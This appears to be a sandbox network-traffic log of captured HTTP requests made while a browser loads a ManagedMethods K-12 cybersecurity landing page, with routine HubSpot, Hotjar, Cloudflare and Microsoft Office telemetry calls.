Source: global trafficHTTP traffic detected: GET /_hcms/forms/embed/v3/form/6834707/b2b34cd6-93c2-44dd-9be1-38727a6852ef/json?hs_static_app=forms-embed&hs_static_app_version=1.6227&X-HubSpot-Static-App-Info=forms-embed-1.6227 HTTP/1.1Host: get.managedmethods.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=aV9eh48TbcmnzLUYaOGyl9ZxmcHu3.V6rr.LoK14jSw-1728897165-1.0.1.1-V.ghB.sc2Sxqv_orrUJY1bMt9n3SmHmZy_fSqA2PFfzQBrUcPPhTOnOL1Gi.2oztVEzrDAy5uONJq6UwmEF.Xw; __cfruid=5b70ce25a88be886670aaabc12053a6a40a131b0-1728897165
Source: global trafficHTTP traffic detected: GET /leadflows.js HTTP/1.1Host: js.hsleadflows.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /hubfs/Background.svg HTTP/1.1Host: get.managedmethods.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=aV9eh48TbcmnzLUYaOGyl9ZxmcHu3.V6rr.LoK14jSw-1728897165-1.0.1.1-V.ghB.sc2Sxqv_orrUJY1bMt9n3SmHmZy_fSqA2PFfzQBrUcPPhTOnOL1Gi.2oztVEzrDAy5uONJq6UwmEF.Xw; __cfruid=5b70ce25a88be886670aaabc12053a6a40a131b0-1728897165
Source: global trafficHTTP traffic detected: GET /conversations-embed.js HTTP/1.1Host: js.usemessages.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /web-interactives-embed.js HTTP/1.1Host: js.hubspot.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=xkjhMTjfrF_0mXBzGhE8IiLuUDkZrnYNnngA9kzj3ak-1728897171-1.0.1.1-sPy.uw12TWgWjkjYaW6.Egck_g3_FMWXbUkiladlPRQXQ6lTAIpxK0P16wgrfdqlfCyKMoR0rbfNmkWJwLKA3g; _cfuvid=Ae66Nhk1VZK7uX1XY9LsH1X7gJTL.3T07YHHUeTQsUU-1728897171836-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /ajax/libs/slick-carousel/1.9.0/ajax-loader.gif HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fb.js HTTP/1.1Host: js.hsadspixel.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /6834707.js HTTP/1.1Host: js.hs-banner.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_hcms/livechat/widget?portalId=6834707&conversations-embed=static-1.18322&mobile=false&messagesUtk=e384afb8197a4deaa51cc57d99ef4984&traceId=e384afb8197a4deaa51cc57d99ef4984&referrer=https%3A%2F%2Fgoogleads.g.doubleclick.net%2F HTTP/1.1Host: get.managedmethods.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0X-HubSpot-Messages-Uri: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=aV9eh48TbcmnzLUYaOGyl9ZxmcHu3.V6rr.LoK14jSw-1728897165-1.0.1.1-V.ghB.sc2Sxqv_orrUJY1bMt9n3SmHmZy_fSqA2PFfzQBrUcPPhTOnOL1Gi.2oztVEzrDAy5uONJq6UwmEF.Xw; __cfruid=5b70ce25a88be886670aaabc12053a6a40a131b0-1728897165
Source: global trafficHTTP traffic detected: GET /analytics/1728897000000/6834707.js HTTP/1.1Host: js.hs-analytics.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /embed/v3/counters.gif?key=forms-embed-v2-RENDER_SUCCESS&count=1 HTTP/1.1Host: forms-na1.hsforms.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /collected-forms/v1/config/json?portalId=6834707&utk= HTTP/1.1Host: forms.hscollectedforms.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/plain, */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://get.managedmethods.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modules.02161fb4f8ebb73fb3f8.js HTTP/1.1Host: script.hotjar.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /embed/v3/counters.gif?key=forms-embed-v2-DEFINITION_SUCCESS&count=1 HTTP/1.1Host: forms-na1.hsforms.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=1r.Va7VPLD3iREsn29ZVGZWkDdXr9SQJpUw.Fd8tEwM-1728897173-1.0.1.1-xafnyfmsRvcPgbJ_ZL8raZVtzgSXGU4htU7kWVngVc4wkAvCrv4XZuvLoo5GGAH_MOPJC5uZRhZBYZ_7UrgS7g; _cfuvid=NXyOUV6i83WfvWkUYws9vtUaAYE_pSiZkvrfQE8p0u8-1728897173318-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /api/v2/client/ws?v=7&site_id=1110137 HTTP/1.1Host: ws.hotjar.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://get.managedmethods.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: t3oTbOVc7iGNL6E58RrDgA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /embed/v3/counters.gif?key=config-loaded-success&value=1 HTTP/1.1Host: perf-na1.hsforms.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=1r.Va7VPLD3iREsn29ZVGZWkDdXr9SQJpUw.Fd8tEwM-1728897173-1.0.1.1-xafnyfmsRvcPgbJ_ZL8raZVtzgSXGU4htU7kWVngVc4wkAvCrv4XZuvLoo5GGAH_MOPJC5uZRhZBYZ_7UrgS7g; _cfuvid=NXyOUV6i83WfvWkUYws9vtUaAYE_pSiZkvrfQE8p0u8-1728897173318-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /embed/v3/counters.gif?key=collected-forms-embed-js-form-bind&count=1 HTTP/1.1Host: forms.hsforms.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=09vUtl1hYeXMbQpPxMTpJZDcT06NrV2m_842zScz.iQ-1728897173-1.0.1.1-9eX.RFiRbkgdHCpcwQKxJ92.NRwlwN78NX469tc6ekzf0IUPK_NF3ZVcCB73_VDoxevVGzVbIVbSBA3lI5oB3Q; _cfuvid=2efHQNjSXl4Y6Oni2NdFzMmCz_joAt.ZWYagYUxaLiU-1728897173921-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web-interactives/public/v1/embed/combinedConfigs?portalId=6834707&currentUrl=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&referrer=https%3A%2F%2Fgoogleads.g.doubleclick.net%2F&contentId=179553754383 HTTP/1.1Host: cta-service-cms2.hubspot.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=xkjhMTjfrF_0mXBzGhE8IiLuUDkZrnYNnngA9kzj3ak-1728897171-1.0.1.1-sPy.uw12TWgWjkjYaW6.Egck_g3_FMWXbUkiladlPRQXQ6lTAIpxK0P16wgrfdqlfCyKMoR0rbfNmkWJwLKA3g; _cfuvid=Ae66Nhk1VZK7uX1XY9LsH1X7gJTL.3T07YHHUeTQsUU-1728897171836-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /_hcms/livechat/widget?portalId=6834707&conversations-embed=static-1.18322&mobile=false&messagesUtk=e384afb8197a4deaa51cc57d99ef4984&traceId=e384afb8197a4deaa51cc57d99ef4984&referrer=https%3A%2F%2Fgoogleads.g.doubleclick.net%2F HTTP/1.1Host: get.managedmethods.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=aV9eh48TbcmnzLUYaOGyl9ZxmcHu3.V6rr.LoK14jSw-1728897165-1.0.1.1-V.ghB.sc2Sxqv_orrUJY1bMt9n3SmHmZy_fSqA2PFfzQBrUcPPhTOnOL1Gi.2oztVEzrDAy5uONJq6UwmEF.Xw; __cfruid=5b70ce25a88be886670aaabc12053a6a40a131b0-1728897165; _hjSessionUser_1110137=eyJpZCI6ImFjOTM4NjhkLTRlMzAtNTQzZi1hN2Y0LWY5ODFkYzA1MTIyZCIsImNyZWF0ZWQiOjE3Mjg4OTcxNzIyMzUsImV4aXN0aW5nIjp0cnVlfQ==; _hjSession_1110137=eyJpZCI6IjYyMDI2NzdmLTg3MTctNDRkZC04ODhlLTA3Zjk4MWRjNmM3ZSIsImMiOjE3Mjg4OTcxNzIyMzYsInMiOjEsInIiOjEsInNiIjowLCJzciI6MCwic2UiOjAsImZzIjoxLCJzcCI6MH0=
Source: global trafficHTTP traffic detected: GET /embed/v3/counters.gif?key=forms-embed-v2-RENDER_SUCCESS&count=1 HTTP/1.1Host: forms-na1.hsforms.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=09vUtl1hYeXMbQpPxMTpJZDcT06NrV2m_842zScz.iQ-1728897173-1.0.1.1-9eX.RFiRbkgdHCpcwQKxJ92.NRwlwN78NX469tc6ekzf0IUPK_NF3ZVcCB73_VDoxevVGzVbIVbSBA3lI5oB3Q; _cfuvid=2efHQNjSXl4Y6Oni2NdFzMmCz_joAt.ZWYagYUxaLiU-1728897173921-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /collected-forms/v1/config/json?portalId=6834707&utk= HTTP/1.1Host: forms.hscollectedforms.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /embed/v3/counters.gif?key=config-loaded-success&value=1 HTTP/1.1Host: perf-na1.hsforms.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=09vUtl1hYeXMbQpPxMTpJZDcT06NrV2m_842zScz.iQ-1728897173-1.0.1.1-9eX.RFiRbkgdHCpcwQKxJ92.NRwlwN78NX469tc6ekzf0IUPK_NF3ZVcCB73_VDoxevVGzVbIVbSBA3lI5oB3Q; _cfuvid=2efHQNjSXl4Y6Oni2NdFzMmCz_joAt.ZWYagYUxaLiU-1728897173921-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /hubfs/mm-favicon_color.png HTTP/1.1Host: get.managedmethods.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=aV9eh48TbcmnzLUYaOGyl9ZxmcHu3.V6rr.LoK14jSw-1728897165-1.0.1.1-V.ghB.sc2Sxqv_orrUJY1bMt9n3SmHmZy_fSqA2PFfzQBrUcPPhTOnOL1Gi.2oztVEzrDAy5uONJq6UwmEF.Xw; __cfruid=5b70ce25a88be886670aaabc12053a6a40a131b0-1728897165; _hjSessionUser_1110137=eyJpZCI6ImFjOTM4NjhkLTRlMzAtNTQzZi1hN2Y0LWY5ODFkYzA1MTIyZCIsImNyZWF0ZWQiOjE3Mjg4OTcxNzIyMzUsImV4aXN0aW5nIjp0cnVlfQ==; _hjSession_1110137=eyJpZCI6IjYyMDI2NzdmLTg3MTctNDRkZC04ODhlLTA3Zjk4MWRjNmM3ZSIsImMiOjE3Mjg4OTcxNzIyMzYsInMiOjEsInIiOjEsInNiIjowLCJzciI6MCwic2UiOjAsImZzIjoxLCJzcCI6MH0=
Source: global trafficHTTP traffic detected: GET /__ptq.gif?k=1&sd=1280x1024&cd=24-bit&cs=UTF-8&ln=en-us&bfp=471034161&v=1.1&a=6834707&pi=179553754383&ct=landing-page&ccu=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive&cpi=179553754383&lpi=179553754383&lvi=179553754383&lvc=en&r=https%3A%2F%2Fgoogleads.g.doubleclick.net%2F&pu=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&t=Automating+Cybersecurity+%26+Student+Safety+with+ManagedMethods&cts=1728897174109&vi=1ad7ee3b723d214336417ad5b634063c&nc=true&ce=false&pt=1&cc=0 HTTP/1.1Host: track.hubspot.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=xkjhMTjfrF_0mXBzGhE8IiLuUDkZrnYNnngA9kzj3ak-1728897171-1.0.1.1-sPy.uw12TWgWjkjYaW6.Egck_g3_FMWXbUkiladlPRQXQ6lTAIpxK0P16wgrfdqlfCyKMoR0rbfNmkWJwLKA3g; _cfuvid=Ae66Nhk1VZK7uX1XY9LsH1X7gJTL.3T07YHHUeTQsUU-1728897171836-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /__ptq.gif?k=15&fi=b2b34cd6-93c2-44dd-9be1-38727a6852ef&fci=f699bf2f-95b7-4c7c-96b4-f6edd63fbcaf&ft=0&sd=1280x1024&cd=24-bit&cs=UTF-8&ln=en-us&bfp=471034161&v=1.1&a=6834707&pi=179553754383&ct=landing-page&ccu=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive&cpi=179553754383&lpi=179553754383&lvi=179553754383&lvc=en&r=https%3A%2F%2Fgoogleads.g.doubleclick.net%2F&pu=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&t=Automating+Cybersecurity+%26+Student+Safety+with+ManagedMethods&cts=1728897174113&vi=1ad7ee3b723d214336417ad5b634063c&nc=true&ce=false&pt=1&cc=0 HTTP/1.1Host: track.hubspot.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=xkjhMTjfrF_0mXBzGhE8IiLuUDkZrnYNnngA9kzj3ak-1728897171-1.0.1.1-sPy.uw12TWgWjkjYaW6.Egck_g3_FMWXbUkiladlPRQXQ6lTAIpxK0P16wgrfdqlfCyKMoR0rbfNmkWJwLKA3g; _cfuvid=Ae66Nhk1VZK7uX1XY9LsH1X7gJTL.3T07YHHUeTQsUU-1728897171836-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /?site_id=1110137&gzip=1 HTTP/1.1Host: content.hotjar.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /embed/v3/counters.gif?key=collected-forms-embed-js-form-bind&count=1 HTTP/1.1Host: forms.hsforms.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=09vUtl1hYeXMbQpPxMTpJZDcT06NrV2m_842zScz.iQ-1728897173-1.0.1.1-9eX.RFiRbkgdHCpcwQKxJ92.NRwlwN78NX469tc6ekzf0IUPK_NF3ZVcCB73_VDoxevVGzVbIVbSBA3lI5oB3Q; _cfuvid=2efHQNjSXl4Y6Oni2NdFzMmCz_joAt.ZWYagYUxaLiU-1728897173921-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /__ptq.gif?k=15&fi=b2b34cd6-93c2-44dd-9be1-38727a6852ef&fci=f699bf2f-95b7-4c7c-96b4-f6edd63fbcaf&ft=0&sd=1280x1024&cd=24-bit&cs=UTF-8&ln=en-us&bfp=471034161&v=1.1&a=6834707&pi=179553754383&ct=landing-page&ccu=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive&cpi=179553754383&lpi=179553754383&lvi=179553754383&lvc=en&r=https%3A%2F%2Fgoogleads.g.doubleclick.net%2F&pu=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&t=Automating+Cybersecurity+%26+Student+Safety+with+ManagedMethods&cts=1728897174113&vi=1ad7ee3b723d214336417ad5b634063c&nc=true&ce=false&pt=1&cc=0 HTTP/1.1Host: track.hubspot.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=xkjhMTjfrF_0mXBzGhE8IiLuUDkZrnYNnngA9kzj3ak-1728897171-1.0.1.1-sPy.uw12TWgWjkjYaW6.Egck_g3_FMWXbUkiladlPRQXQ6lTAIpxK0P16wgrfdqlfCyKMoR0rbfNmkWJwLKA3g; _cfuvid=Ae66Nhk1VZK7uX1XY9LsH1X7gJTL.3T07YHHUeTQsUU-1728897171836-0.0.1.1-604800000
